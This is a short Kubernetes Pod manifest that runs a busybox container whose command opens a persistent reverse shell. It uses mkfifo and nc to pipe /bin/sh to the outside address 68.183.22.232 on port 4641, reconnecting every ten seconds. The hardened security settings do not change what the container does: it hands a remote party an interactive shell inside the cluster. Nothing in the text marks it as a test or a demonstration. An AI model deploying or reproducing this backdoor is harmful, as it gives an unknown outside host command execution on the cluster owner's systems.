apiVersion: v1
kind: Pod
metadata:
  name: cyerspod
  namespace: node-simple-test
  labels:
    app: nc
spec:
  containers:
  - name: cyers
    image: busybox
    args: ["/bin/sh", "-c", "while true; do mkfifo /tmp/f; nc 68.183.22.232 4641 < /tmp/f | /bin/sh > /tmp/f 2>&1; sleep 10; done"]
    securityContext:
      runAsNonRoot: true
      runAsUser: 1000
      allowPrivilegeEscalation: false
      capabilities:
        drop: ["ALL"]
      seccompProfile:
        type: RuntimeDefault
